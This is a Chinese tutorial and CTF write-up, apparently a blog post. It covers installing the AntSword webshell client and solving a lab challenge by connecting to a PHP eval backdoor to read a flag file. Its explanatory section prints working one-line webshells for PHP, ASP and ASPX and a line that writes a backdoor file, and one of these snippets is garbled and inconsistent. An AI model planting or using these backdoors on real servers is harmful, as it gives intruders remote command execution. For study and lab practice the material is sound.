蚁剑（AntSword）是什么？

中国蚁剑是一款开源的跨平台网站管理工具，它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

获取蚁剑

环境：win10

文件：如下图所示（第一个是蚁剑的加载器，第二个是蚁剑的源码，二者缺一不可）

蚁剑下载器

下载器获取地址：https://github.com/AntSwordProject/AntSword-Loader

根据你的环境下载对应的安装包。

蚁剑源码

点击下载蚁剑源码

（源码与环境无关，大家可以直接下载）

安装

把两个包放在一个文件夹下（也可以不放在一起），然后解压缩。

1、打开加载器，找到AntSword.exe文件，双击它。

2、点击初始化，文件路径选择antSword-master文件下，因为里面有源码。如果选择一个空目录作为蚁剑的工作目录，加载器会自动下载源代码，但是可能会报错。

3、待提示初始化完毕时，重新打开蚁剑加载器，即可看到蚁剑的主界面。

可能遇到的问题

Q: 下载或者解压出错

A: 遇到这种问题，按照下面步骤手动进行：

手动 clone antsword 源代码, 或者直接点这里下载源代码并解压

$ git clone https://github.com/AntSwordProject/AntSword.git

打开加载器，选择源代码所在目录(简单理解为 app.js 所在目录)。

例如app.js路径为：D:\test\antsword\app.js，那么选择的目录主是 D:\test\antsword\

特别提醒，不要中文路径

Q: Kali Linux 下 Segmentation fault

A: 参考 AntSword-Loader #3

题目

小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。

题意

点击连接，打开页面，第一眼看见

你会使用webshell吗？
<?php @eval($_POST['shell']);?>

什么是webshell？

以下内容源于以下博客

https://blog.csdn.net/qq_36119192/article/details/84563791

webshell是黑客行话里面的“大马”，一句话木马是“小马”。

webshell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp、aspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起，然后就可以使用浏览器来访问该后门文件了，从而得到一个命令执行环境，以达到控制网站服务器的目的。

顾名思义，“web”的含义是显然需要服务器开放web服务，“shell”的含义是取得对服务器某种程度上的操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现，也有人称之为网站的后门工具。

一方面，webshell被站长常常用于网站管理、服务器管理等等，根据FSO权限的不同，作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。

另一方面，被入侵者利用，从而达到控制网站服务器的目的。这些网页脚本常称为Web脚本木马，比较流行的asp或php木马，也有基于.NET的脚本木马与JSP脚本木马。

因为上面所介绍webshell概念中提到的大马在现阶段的安全领域中已经被盯的非常紧了，而且各种杀毒软件和防火墙软件都对这种“大马”有了甄别能力，所以如果被渗透的web服务器中安装了防御软件的话，留下这种大马作为自己的webshell就非常困难了，于是一种新型的webshell就横空出世了，那就是一句话木马。

简单来说一句话木马就是通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获得webshell的方法。对于不同的语言有不同的构造方法，基本构造是首先出现的是脚本开始的标记，后边跟着的 eval 或者是 execute 是核心部分，就是获取并执行后边得到的内容，而后边得到的内容，是 request 或者是 $_POST 获取的值。如果我们通过客户端向服务器发送，那么就会让服务器执行我们发送的脚本，挂马就实现了。

一些不同脚本语言的一句话木马

php一句话木马：  <?php @eval($_POST[value]); ?>
asp一句话木马：  <%eval request ("value")%> 或  <% execute(request("value")) %>
aspx一句话木马： <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %><?php fputs( fopen('xie.php','w') , '<? php eval($_POST[xie]) ?>' ) ; ?>
将当前目录下创建xie.php文件，并且将一句话木马写入xd.php中

题解

1、打开蚁剑（双击AntSword.exe），在空白位置单击「鼠标右键」，弹出菜单，选择「添加数据」，在URL地址输入地址，连接密码输入「shell」，点击「添加」即可。

2、双击这条数据，在html下双击flag.txt文件，即可得到flag。

【蚁剑的安装与使用+例题实战】【CTF】webshell相关推荐

中国蚁剑(win32-x64)——安装报错：解压代码出错：[object Object]
参考文章中国蚁剑安装步骤(win10 64) 报错:解压代码出错:[object Object]
中国蚁剑下载安装以及插件的安装教程
一,中国蚁剑下载唯一官方github下载地址: AntSwordProject · GitHub 加载器: GitHub - AntSwordProject/AntSword-Loader: Ant ...
中国蚁剑安装使用教程
中国蚁剑安装使用教程前言一.中国蚁剑安装二.中国蚁剑使用 2.1中国蚁剑连接木马 2.2中国蚁剑设置代理 2.3中国蚁剑参数设置 2.4中国蚁剑其他使用三. 中国蚁剑绕过Waf 3.1 编码绕 ...
windows,linux 蚁剑下载与安装与手动安装插件disable_functions
前言:因为buuctf上的[极客大挑战 2019]RCE ME这个题目复现,需要蚁剑的某个插件,当时因为不知道蚁剑的插件disable_functions这个东西怎么搞,走了很多弯路,故此记录一下,希 ...
【蚁剑工具-01】网站管理工具之中国蚁剑安装过程详解以及应用实例
目录 1 中国蚁剑安装及设置 1.1 下载 1.2 安装 1.3 相关设置 2 中国蚁剑应用实例 2.1 操作环境 2.2 具体步骤 3 总结参考文章任何人不得将其用于非法用途以及盈利等目的,也禁 ...
蚁剑的下载、安装与使用
今天继续给大家介绍渗透测试相关知识,本文主要内容是蚁剑的下载.安装与使用. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调:严禁对未授 ...
渗透测试-流量加密之冰蝎蚁剑
文章目录前言冰蝎 PHP冰蝎马通信数据包冰蝎初体验冰蝎攻与防蚁剑蚁剑的安装蚁剑初体验蚁剑编码器蚁剑攻与防总结前言一句话木马是一般是指一段短小精悍的恶意代码,这段代码可以用作一 ...
蚁剑软件的配置与应用
蚁剑软件的配置与应用蚁剑(antSword)是一款开源的网站管理软件,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员,由于蚁剑(antSword)所有脚本的源代码均来自中国菜刀, ...
攻防兼备：中国蚁剑使用指南及特征流量
中国蚁剑是菜刀的升级版本,线现下主流的Webshell连接工具之一,有着较广泛的使用,本篇文章会教给大家蚁剑的使用方法以及不同加密方式的流量特征,兼顾攻防两端. 蚁剑下载安装参考:中国蚁剑(antSw ...

【蚁剑的安装与使用+例题实战】【CTF】webshell

目录